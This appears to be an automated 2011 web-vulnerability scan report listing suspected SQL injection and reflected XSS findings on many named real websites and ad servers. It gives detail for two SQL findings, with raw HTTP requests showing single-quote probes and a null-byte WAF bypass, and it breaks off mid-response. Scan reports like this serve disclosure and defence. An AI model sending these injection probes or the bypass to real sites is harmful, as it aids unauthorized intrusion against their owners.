XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, McAfee 09302011-02

Report generated by dork at Fri Sep 30 08:36:11 CDT 2011.


Loading

1. SQL injection

1.1. http://fe4f88.r.axf8.net/mr/e.gif [a parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [lmt parameter]

1.3. http://i.glimg.net/ui/stylesheets/common.css [REST URL parameter 3]

1.4. http://www.myllc.com/ [User-Agent HTTP header]

1.5. http://www.myllc.com/ [name of an arbitrarily supplied request parameter]

1.6. http://www.reservetravel.com/v6 [BIGipServerimages cookie]

1.7. http://www.reservetravel.com/v6 [BIGipServerlinux cookie]

1.8. http://www.reservetravel.com/v6 [Referer HTTP header]

1.9. http://www.reservetravel.com/v6 [Referer HTTP header]

1.10. http://www.reservetravel.com/v6 [User-Agent HTTP header]

1.11. http://www.reservetravel.com/v6 [User-Agent HTTP header]

1.12. http://www.reservetravel.com/v6 [__utma cookie]

1.13. http://www.reservetravel.com/v6 [__utmb cookie]

1.14. http://www.reservetravel.com/v6 [__utmc cookie]

1.15. http://www.reservetravel.com/v6 [__utmv cookie]

1.16. http://www.reservetravel.com/v6 [__utmz cookie]

1.17. http://www.reservetravel.com/v6 [currency cookie]

1.18. http://www.reservetravel.com/v6 [name of an arbitrarily supplied request parameter]

1.19. http://www.reservetravel.com/v6 [name of an arbitrarily supplied request parameter]

1.20. http://www.reservetravel.com/v6 [server cookie]

1.21. http://www.reservetravel.com/v6 [siteId cookie]

1.22. http://www.reservetravel.com/v6 [siteid parameter]

1.23. http://www.reservetravel.com/v6 [siteid parameter]

1.24. http://www.reservetravel.com/v6 [type parameter]

2. Cross-site scripting (reflected)

2.1. http://634454825056194218.contentcastsyndication.com/Csp/ [audience parameter]

2.2. http://634454825056194218.contentcastsyndication.com/Csp/ [banner parameter]

2.3. http://634454825056194218.contentcastsyndication.com/Csp/ [category parameter]

2.4. http://634454825056194218.contentcastsyndication.com/Csp/ [t parameter]

2.5. http://ad.thewheelof.com/st [ad_size parameter]

2.6. http://ad.thewheelof.com/st [ad_size parameter]

2.7. http://ad.thewheelof.com/st [section parameter]

2.8. http://ad.thewheelof.com/st [section parameter]

2.9. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.10. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/2c45d5ca-e317-11dd-b30b-cbea775a248d/URUGUAY-thumbnail.jpg [REST URL parameter 4]

2.11. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/2c45d5ca-e317-11dd-b30b-cbea775a248d/URUGUAY-thumbnail.jpg [REST URL parameter 5]

2.12. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/2c45d5ca-e317-11dd-b30b-cbea775a248d/URUGUAY-thumbnail.jpg [REST URL parameter 6]

2.13. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/52f86e83-c9fb-11dd-9053-776d2787bb9c/Caribbeanthumb1.jpg [REST URL parameter 4]

2.14. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/52f86e83-c9fb-11dd-9053-776d2787bb9c/Caribbeanthumb1.jpg [REST URL parameter 5]

2.15. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/52f86e83-c9fb-11dd-9053-776d2787bb9c/Caribbeanthumb1.jpg [REST URL parameter 6]

2.16. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/748e6e4f-9a83-479e-b964-923bd18e00af/maldonado-region-thumb.jpg [REST URL parameter 4]

2.17. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/748e6e4f-9a83-479e-b964-923bd18e00af/maldonado-region-thumb.jpg [REST URL parameter 5]

2.18. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/748e6e4f-9a83-479e-b964-923bd18e00af/maldonado-region-thumb.jpg [REST URL parameter 6]

2.19. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/97c74228-cb60-11dd-95ac-937877940723/switzerlandthumb1.jpg [REST URL parameter 4]

2.20. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/97c74228-cb60-11dd-95ac-937877940723/switzerlandthumb1.jpg [REST URL parameter 6]

2.21. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/b348cfb5-72d5-4cca-b1ba-386470d0d8e1/BRITISH%20COLUMBIA%20THUMBNAIL%201.jpg [REST URL parameter 4]

2.22. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/b348cfb5-72d5-4cca-b1ba-386470d0d8e1/BRITISH%20COLUMBIA%20THUMBNAIL%201.jpg [REST URL parameter 5]

2.23. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/b348cfb5-72d5-4cca-b1ba-386470d0d8e1/BRITISH%20COLUMBIA%20THUMBNAIL%201.jpg [REST URL parameter 6]

2.24. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/c562b420-c9fa-11dd-9053-776d2787bb9c/Canada-thumb1.jpg [REST URL parameter 4]

2.25. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/c562b420-c9fa-11dd-9053-776d2787bb9c/Canada-thumb1.jpg [REST URL parameter 5]

2.26. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/c562b420-c9fa-11dd-9053-776d2787bb9c/Canada-thumb1.jpg [REST URL parameter 6]

2.27. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/e91137de-5ec9-482e-a154-b55e1f592129/st%20barts%20thumb.jpg [REST URL parameter 4]

2.28. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/e91137de-5ec9-482e-a154-b55e1f592129/st%20barts%20thumb.jpg [REST URL parameter 5]

2.29. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/e91137de-5ec9-482e-a154-b55e1f592129/st%20barts%20thumb.jpg [REST URL parameter 6]

2.30. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/f18b5f55-1064-468b-8763-fa81ebb0d9db/valais-thumb.jpg [REST URL parameter 4]

2.31. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/f18b5f55-1064-468b-8763-fa81ebb0d9db/valais-thumb.jpg [REST URL parameter 5]

2.32. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/f18b5f55-1064-468b-8763-fa81ebb0d9db/valais-thumb.jpg [REST URL parameter 6]

2.33. http://allgetaways.us.intellitxt.com/al.asp [jscallback parameter]

2.34. http://allgetaways.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

2.35. http://allgetaways.us.intellitxt.com/v4/init [jscallback parameter]

2.36. http://allgetaways.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

2.37. http://api-public.addthis.com/url/shares.json [callback parameter]

2.38. http://api.bizographics.com/v1/profile.json [api_key parameter]

2.39. http://api.bizographics.com/v1/profile.json [callback parameter]

2.40. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.41. http://b.scorecardresearch.com/beacon.js [c10 parameter]

2.42. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.43. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.44. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.45. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.46. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.47. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.48. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/CSP [audience parameter]

2.49. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/CSP [banner parameter]

2.50. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/CSP [category parameter]

2.51. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/CSP [i parameter]

2.52. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/CSP [t parameter]

2.53. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/d1.aspx [banner parameter]

2.54. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/d1.aspx [i parameter]

2.55. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/d1.aspx [name of an arbitrarily supplied request parameter]

2.56. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/d1.aspx [p6(ct1&cd63i99&fCampaigns_Local_Audience~1 parameter]

2.57. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/CSP [audience parameter]

2.58. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/CSP [banner parameter]

2.59. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/CSP [category parameter]

2.60. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/CSP [i parameter]

2.61. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/CSP [t parameter]

2.62. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/d1.aspx [banner parameter]

2.63. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/d1.aspx [i parameter]

2.64. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/d1.aspx [name of an arbitrarily supplied request parameter]

2.65. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/d1.aspx [p6(ct1&cd60i99&fCampaigns_Local_Audience~1 parameter]

2.66. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/CSP [audience parameter]

2.67. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/CSP [banner parameter]

2.68. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/CSP [category parameter]

2.69. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/CSP [i parameter]

2.70. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/CSP [t parameter]

2.71. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/d1.aspx [banner parameter]

2.72. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/d1.aspx [i parameter]

2.73. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/d1.aspx [name of an arbitrarily supplied request parameter]

2.74. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/d1.aspx [p6(ct1&cd57i99&fCampaigns_Local_Audience~1 parameter]

2.75. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/CSP [audience parameter]

2.76. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/CSP [banner parameter]

2.77. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/CSP [category parameter]

2.78. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/CSP [i parameter]

2.79. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/CSP [t parameter]

2.80. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/d1.aspx [banner parameter]

2.81. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/d1.aspx [i parameter]

2.82. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/d1.aspx [name of an arbitrarily supplied request parameter]

2.83. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/d1.aspx [p6(ct1&cd53i99&fCampaigns_Local_Audience~1 parameter]

2.84. http://dm.demdex.net/event [d_cb parameter]

2.85. http://img.mediaplex.com/content/0/9957/135309/V2ADFSuiteOffer_300x250.js [mpck parameter]

2.86. http://img.mediaplex.com/content/0/9957/135309/V2ADFSuiteOffer_300x250.js [mpck parameter]

2.87. http://img.mediaplex.com/content/0/9957/135309/V2ADFSuiteOffer_300x250.js [mpvc parameter]

2.88. http://img.mediaplex.com/content/0/9957/135309/V2ADFSuiteOffer_300x250.js [mpvc parameter]

2.89. http://inbrwsvc01.inenvi.com/SightMaxAgentInterface/agentinterfacejsonp.svc/site/GetVisitorAgentSessionMonitorCommand [callback parameter]

2.90. http://js.revsci.net/gateway/gw.js [csid parameter]

2.91. http://link.undertone.com/st [name of an arbitrarily supplied request parameter]

2.92. http://my.soft32.com/json [callback parameter]

2.93. http://oc.cardsynergy.com/t/ [c parameter]

2.94. http://pluckit.demandmedia.com/requests [apiKey parameter]

2.95. http://pluckit.demandmedia.com/requests [jsonpCallback parameter]

2.96. http://pluckit.demandmedia.com/requests [jsonpContext parameter]

2.97. http://server.iad.liveperson.net/hc/8324495/ [divID parameter]

2.98. https://ssl.omnihotels.com/Omni [account_code parameter]

2.99. https://ssl.omnihotels.com/Omni [account_code parameter]

2.100. https://ssl.omnihotels.com/Omni [account_code parameter]

2.101. https://ssl.omnihotels.com/Omni [hotelCode parameter]

2.102. https://ssl.omnihotels.com/Omni [invBlockCode parameter]

2.103. https://ssl.omnihotels.com/Omni [invBlockCode parameter]

2.104. https://ssl.omnihotels.com/Omni [room_number parameter]

2.105. https://ssl.omnihotels.com/Omni [room_qty parameter]

2.106. https://ssl.omnihotels.com/Omni [room_qty parameter]

2.107. https://ssl.omnihotels.com/Omni [room_qty parameter]

2.108. https://ssl.omnihotels.com/Omni [room_qty parameter]

2.109. https://ssl.trails.com/subscribe.aspx [name of an arbitrarily supplied request parameter]

2.110. https://ssl.trails.com/subscribe.aspx [oc parameter]

2.111. http:///AST354880053/direct/01/2448194 [name of an arbitrarily supplied request parameter]

2.112. http:///MED336191486/direct/013055770899 [REST URL parameter 4]

2.113. http:///MED336191486/direct/013055770899 [click parameter]

2.114. http:///MED336191486/direct/013055770899 [click parameter]

2.115. http:///MED336191486/direct/013055770899 [click parameter]

2.116. http:///MED336191486/direct/013055770899 [name of an arbitrarily supplied request parameter]

2.117. http:///MED336191486/direct/013055770899 [name of an arbitrarily supplied request parameter]

2.118. http:///MED336191486/direct/013055770899 [name of an arbitrarily supplied request parameter]

2.119. http:///MED336191486/direct/013813509777 [REST URL parameter 4]

2.120. http:///MED336191486/direct/013813509777 [click parameter]

2.121. http:///MED336191486/direct/013813509777 [click parameter]

2.122. http:///MED336191486/direct/013813509777 [click parameter]

2.123. http:///MED336191486/direct/013813509777 [name of an arbitrarily supplied request parameter]

2.124. http:///MED336191486/direct/013813509777 [name of an arbitrarily supplied request parameter]

2.125. http:///MED336191486/direct/013813509777 [name of an arbitrarily supplied request parameter]

2.126. https://www.4structures.com/4structures/front/search/main/searchProcess.jsp [queryString parameter]

2.127. http://www.allgetaways.com/travel-articles/articlePage.asp [name of an arbitrarily supplied request parameter]

2.128. http://www.barcelonapoint.com/ [name of an arbitrarily supplied request parameter]

2.129. http://www.barcelonapoint.com/apartment_results.php [&token parameter]

2.130. http://www.barcelonapoint.com/apartment_results.php [REST URL parameter 1]

2.131. http://www.barcelonapoint.com/apartment_results.php [lang parameter]

2.132. http://www.barcelonapoint.com/apartment_results.php [name of an arbitrarily supplied request parameter]

2.133. http://www.barcelonapoint.com/apartment_results.php [name of an arbitrarily supplied request parameter]

2.134. http://www.barcelonapoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php [REST URL parameter 1]

2.135. http://www.barcelonapoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php [REST URL parameter 2]

2.136. http://www.barcelonapoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php [REST URL parameter 3]

2.137. http://www.barcelonapoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php [REST URL parameter 4]

2.138. http://www.barcelonapoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php [REST URL parameter 5]

2.139. http://www.barcelonapoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php [REST URL parameter 6]

2.140. http://www.barcelonapoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php [REST URL parameter 7]

2.141. http://www.barcelonapoint.com/en/popup/email_friend/ [REST URL parameter 1]

2.142. http://www.barcelonapoint.com/en/popup/email_friend/ [REST URL parameter 2]

2.143. http://www.barcelonapoint.com/favicon.ico [REST URL parameter 1]

2.144. http://www.barcelonapoint.com/images/barrio_11.png [REST URL parameter 1]

2.145. http://www.barcelonapoint.com/images/barrio_11.png [REST URL parameter 2]

2.146. http://www.barcelonapoint.com/images/barrio_11.png [name of an arbitrarily supplied request parameter]

2.147. http://www.barcelonapoint.com/includes/service/ServiceRequest.php [REST URL parameter 1]

2.148. http://www.barcelonapoint.com/includes/service/ServiceRequest.php [REST URL parameter 1]

2.149. http://www.barcelonapoint.com/includes/service/ServiceRequest.php [REST URL parameter 2]

2.150. http://www.barcelonapoint.com/includes/service/ServiceRequest.php [REST URL parameter 2]

2.151. http://www.barcelonapoint.com/includes/service/ServiceRequest.php [REST URL parameter 3]

2.152. http://www.barcelonapoint.com/includes/service/ServiceRequest.php [REST URL parameter 3]

2.153. http://www.barcelonapoint.com/results.php [REST URL parameter 1]

2.154. http://www.barcelonapoint.com/results.php [REST URL parameter 1]

2.155. http://www.duiattorney.com/zip_search/zip_search.php [b parameter]

2.156. http://www.duiattorney.com/zip_search/zip_search.php [name of an arbitrarily supplied request parameter]

2.157. http://www.duiattorney.com/zip_search/zip_styles.php [background parameter]

2.158. http://www.duiattorney.com/zip_search/zip_styles.php [name of an arbitrarily supplied request parameter]

2.159. http://www.edgetechcorp.com/ [name of an arbitrarily supplied request parameter]

2.160. http://www.edgetechcorp.com/handlers/FindMemoryCSS.ashx [dhb parameter]

2.161. http://www.giftsforeurope.com/favicon.ico [REST URL parameter 1]

2.162. http://www.giftsforeurope.com/index_en.htm [REST URL parameter 1]

2.163. http://www.golffacility.com/Search.aspx [CID parameter]

2.164. http://www.golffacility.com/combinedsearch.aspx [CID parameter]

2.165. http://www.incorp.com/ [name of an arbitrarily supplied request parameter]

2.166. http://www.mongoosemetrics.com/correlation/json_find_correlation_number.php [REST URL parameter 1]

2.167. http://www.mongoosemetrics.com/correlation/json_find_correlation_number.php [REST URL parameter 2]

2.168. http://www.mongoosemetrics.com/correlation/json_find_correlation_number.php [callback parameter]

2.169. http://www.pcmemorystore.com/Glossaryws.asmx/js [__svcPath parameter]

2.170. http://www.pettravelcenter.com/ [name of an arbitrarily supplied request parameter]

2.171. http://www.pettravelcenter.com/page_items/itemList/78 [name of an arbitrarily supplied request parameter]

2.172. http://www.pettravelcenter.com/page_items/viewSingle/23 [name of an arbitrarily supplied request parameter]

2.173. http://www.planswift.com/images/graphics/zoomout.cur [REST URL parameter 1]

2.174. http://www.planswift.com/images/graphics/zoomout.cur [REST URL parameter 2]

2.175. http://www.planswift.com/images/graphics/zoomout.cur [REST URL parameter 3]

2.176. http://www.planswift.com/templates/PlanSwift_Template/favicon.ico [REST URL parameter 1]

2.177. http://www.planswift.com/templates/PlanSwift_Template/favicon.ico [REST URL parameter 2]

2.178. http://www.planswift.com/templates/PlanSwift_Template/favicon.ico [REST URL parameter 3]

2.179. http://www.sayutracking.co.uk/landing.js [client_id parameter]

2.180. http://www.staydublin.com/results.php [adults parameter]

2.181. http://www.staydublin.com/results.php [adults parameter]

2.182. http://www.staydublin.com/results.php [kids parameter]

2.183. http://www.staydublin.com/results.php [kids parameter]

2.184. http://www.staydublin.com/results.php [name of an arbitrarily supplied request parameter]

2.185. http://www.staydublin.com/results.php [search parameter]

2.186. http://www.staydublin.com/results.php [search.x parameter]

2.187. http://www.staydublin.com/results.php [search.y parameter]

2.188. http://www.staydublin.com/results.php [sleeps parameter]

2.189. http://www.trails.com/ [name of an arbitrarily supplied request parameter]

2.190. http://www.trails.com/activities.aspx [REST URL parameter 1]

2.191. http://www.trails.com/mytrails/ [REST URL parameter 1]

2.192. http://www.trails.com/national-park-trails.aspx [REST URL parameter 1]

2.193. http://www.trails.com/national-park-trails.aspx [name of an arbitrarily supplied request parameter]

2.194. http://www.trails.com/recent_reviews.aspx [REST URL parameter 1]

2.195. http://www.trails.com/recent_reviews.aspx [name of an arbitrarily supplied request parameter]

2.196. http://www.trails.com/tcatalog_trail.aspx [REST URL parameter 1]

2.197. http://www.trails.com/tcatalog_trail.aspx [name of an arbitrarily supplied request parameter]

2.198. http://www.trails.com/trailfinder/browsebymap/ [REST URL parameter 1]

2.199. http://www.trails.com/trailfinder/browsebymap/ [REST URL parameter 2]

2.200. http://www.trails.com/trailfinder/browsebymap/ [name of an arbitrarily supplied request parameter]

2.201. http://ad.thewheelof.com/st [Referer HTTP header]

2.202. http://ad.yieldmanager.com/imp [Referer HTTP header]

2.203. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

2.204. http://www.migratenow.ca/Family-Class-p1c43e0.htm [Referer HTTP header]

2.205. http://www.migratenow.ca/Provincial-Nomination-p1c42e0.htm [Referer HTTP header]

2.206. http://edge.helpserve.com/visitor/index.php [SWIFT_client cookie]

2.207. http://edge.helpserve.com/visitor/index.php [SWIFT_visitorsession cookie]

2.208. http://support.tophost.gr/visitor/index.php [SWIFT_client cookie]

2.209. http://support.tophost.gr/visitor/index.php [SWIFT_visitorsession cookie]

2.210. http:///iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]



1. SQL injection  next
There are 24 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://fe4f88.r.axf8.net/mr/e.gif [a parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fe4f88.r.axf8.net
Path:   /mr/e.gif

Issue detail

The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /mr/e.gif?info=%7Bn%3Ac%7Cc%3A169998136545839%7Cd%3A1%7Ca%3AFE4F88%7Ch%3A1%7Ce%3A%7Cb%3A%7Cl%3Ahttp%24*%24%2F%2Fwww.incorp.com%2F%7Cm%3A1920%7Co%3A1200%7Cp%3AWin32%7Cg%3AChrome%7Cf%3A14.0.835.186%7D%7Bn%3Au%7Ce%3A1%7D&a=FE4F88'&r=1&s=1 HTTP/1.1
Host: fe4f88.r.axf8.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.incorp.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 3028
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 30 Sep 2011 13:19:30 GMT

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /mr/e.gif?info=%7Bn%3Ac%7Cc%3A169998136545839%7Cd%3A1%7Ca%3AFE4F88%7Ch%3A1%7Ce%3A%7Cb%3A%7Cl%3Ahttp%24*%24%2F%2Fwww.incorp.com%2F%7Cm%3A1920%7Co%3A1200%7Cp%3AWin32%7Cg%3AChrome%7Cf%3A14.0.835.186%7D%7Bn%3Au%7Ce%3A1%7D&a=FE4F88''&r=1&s=1 HTTP/1.1
Host: fe4f88.r.axf8.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.incorp.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 37
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 30 Sep 2011 13:19:30 GMT

gomez.b3(0,0);if(gomez.n0)gomez.n0();

1.2. http://googleads.g.doubleclick.net/pagead/ads [lmt parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The lmt parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lmt parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-9557030546015098&output=html&h=125&slotname=6401409148&w=125&lmt=1317406604%00'&flash=10.3.183&url=http%3A%2F%2Fwww.abritel.fr%2Fannonces%2Flocation-vacances%2Ffrance_provence-alpes-cote%2520d'azur_dt0.php&dt=1317388604443&bpp=246&shv=r20110921&jsv=r20110914&correlator=1317388604774&frm=4&adk=1455022710&ga_vid=811642571.1317388383&ga_sid=1317388383&ga_hid=525265988&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=22&u_nmime=104&dff=helvetica&dfs=14&adx=102&ady=2881&biw=1067&bih=877&ref=http%3A%2F%2Fwww.abritel.fr%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=475&xpc=djlPO5jEz9&p=http%3A//www.abritel.fr HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 30 Sep 2011 13:19:05 GMT
Server: cafe
Cache-Control: private
Content-Length: 7780
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={
...[SNIP]...
c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-9557030546015098&output=html&h=125&slotname=6401409148&w=125&lmt=1317406604%00''&flash=10.3.183&url=http%3A%2F%2Fwww.abritel.fr%2Fannonces%2Flocation-vacances%2Ffrance_provence-alpes-cote%2520d'azur_dt0.php&dt=1317388604443&bpp=246&shv=r20110921&jsv=r20110914&correlator=1317388604774&frm=4&adk=1455022710&ga_vid=811642571.1317388383&ga_sid=1317388383&ga_hid=525265988&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=22&u_nmime=104&dff=helvetica&dfs=14&adx=102&ady=2881&biw=1067&bih=877&ref=http%3A%2F%2Fwww.abritel.fr%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=475&xpc=djlPO5jEz9&p=http%3A//www.abritel.fr HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
